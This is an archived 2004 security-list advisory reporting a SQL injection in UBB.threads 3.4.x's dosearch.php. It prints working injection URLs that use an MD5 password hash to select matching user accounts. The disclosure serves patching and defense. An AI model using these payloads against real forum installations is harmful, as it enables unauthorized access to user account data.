SQL Injection in UBB.threads 3.4.x

From: Florian Rock (florianrock_at_web.de)
Date: 10/21/04

  • Next message: Gary E. Miller: "RE: [Full-Disclosure] Windows Time Synchronization - Best Practices"
    To: <bugs@securitytracker.com>
    Date: Thu, 21 Oct 2004 22:35:24 +0200
    
    

    Product:
    ========
    UBB.threads

    Vendor:
    =======
    UBBCentral (http://www.ubbcentral.com/)

    Versions:
    =========
    I tested it successfull on 3.4.x
    At Version 3.5 you need to be logged in to perform a search. I didnt tested
    this version.

    Problem:
    ========
    Sql-Injection in dosearch.php
    dosearch.php?Name=' OR U_Password='PWINMD5

    Impact:
    =======
    A remote user can inject SQL commands

    Example:
    ========
    db5c82346d770f48bdd8929094c0c695 (ubbpass)

    /dosearch.php?Name=' OR U_Password='db5c82346d770f48bdd8929094c0c695
    OR
    /dosearch.php?Name=' OR U_Password='db5c82346d770f48bdd8929094c0c695'/*
    -> selects a user who got "ubbpass" as password.

    Greets fly out to:
    ==================
    felx, zodiac, nostalg1c, chris, lexxor, haggi, li, xlr, rest of p32,
    peti, danjo, milch_trinker, hecky, and all i forgot

    Greets
    Florian Rock aka Remoter


  • Next message: Gary E. Miller: "RE: [Full-Disclosure] Windows Time Synchronization - Best Practices"